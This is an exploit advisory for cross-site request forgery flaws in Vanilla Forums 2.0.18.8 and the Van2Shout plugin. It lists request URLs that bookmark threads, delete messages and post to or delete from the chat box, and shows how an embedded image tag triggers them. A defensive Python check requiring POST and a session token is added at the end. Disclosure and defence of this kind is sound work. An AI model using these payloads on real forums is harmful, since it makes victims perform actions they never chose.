# Exploit Title: Vanilla Forums <= 2.0.18.8 & Van2Shout 1.0.51 Multiple CSRF
# Google Dork: n/a
# Date: 13/4/13
# Exploit Author: Henry Hoggard
# Vendor Homepage: [http://vanillaforums.org/ , http://vanillaforums.org/addon/van2shout-plugin]
# Software Link: [http://vanillaforums.org/download, http://vanillaforums.org/get/van2shout-plugin-1.051]
# Version: [2.0.18.8 , 1.0.51]
# Tested on: [Debian]
# CVE :

=======================

These can be exploited by having the user visit a thread containing an image whose src is one of the URLs below.

eg <img src="http://site.org/index.php=/vanilla/discussion/bookmark/1337?> where 1337 is the id.

Bookmark CSRF:

http://site.org/index.php=/vanilla/discussion/bookmark/1337

UnBookmark CSRF:

http://site.org/index.php=/vanilla/discussion/bookmark/1337?

Delete Message CSRF:

http://site.org/index.php=/messages/clear/1337

Post to Van2Shout Chat Box CSRF:

http://site.org/index.php?p=/plugin/Van2ShoutData&newpost=testmessage

Delete Message from Van2Shout Chatbox CSRF:

http://site.org/index.php?p=/plugin/Van2ShoutData&del=1337
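
The server-side check that closes the image-tag vector described above, as an added example (not code from the advisory, Vanilla Forums or Van2Shout): state-changing routes are refused unless they arrive as POST with a per-session token. The `csrf_token` field name and the function names are assumptions made for this sketch; the route patterns are taken from the URLs listed above.

```python
import hmac
import re
import secrets

# Routes from the advisory that change state (matched anywhere in the URL).
STATE_CHANGING = (
    re.compile(r"/discussion/bookmark/\d+"),
    re.compile(r"/messages/clear/\d+"),
    re.compile(r"/plugin/Van2ShoutData\b.*[?&](?:newpost|del)="),
)


def new_token():
    """Per-session random token; store it server-side in the session."""
    return secrets.token_urlsafe(32)


def changes_state(url):
    return any(p.search(url) for p in STATE_CHANGING)


def allow_request(method, url, form, session_token):
    """Return (allowed, reason) for one request.

    form is the parsed POST body; csrf_token is an assumed field name.
    """
    if not changes_state(url):
        return True, "read-only route"
    # An <img> tag can only issue GET, so this alone stops the image vector.
    if method.upper() != "POST":
        return False, "state change requires POST"
    # Token is read from the body only, so it never appears in URLs or Referer.
    supplied = form.get("csrf_token", "")
    if not session_token or not hmac.compare_digest(
        supplied.encode(), session_token.encode()
    ):
        return False, "missing or invalid CSRF token"
    return True, "ok"


if __name__ == "__main__":
    token = new_token()
    # Constructed sample requests using the advisory's URLs.
    url = "http://site.org/index.php=/messages/clear/1337"
    for method, form in (("GET", {}), ("POST", {}), ("POST", {"csrf_token": token})):
        print(method, url, allow_request(method, url, form, token))
```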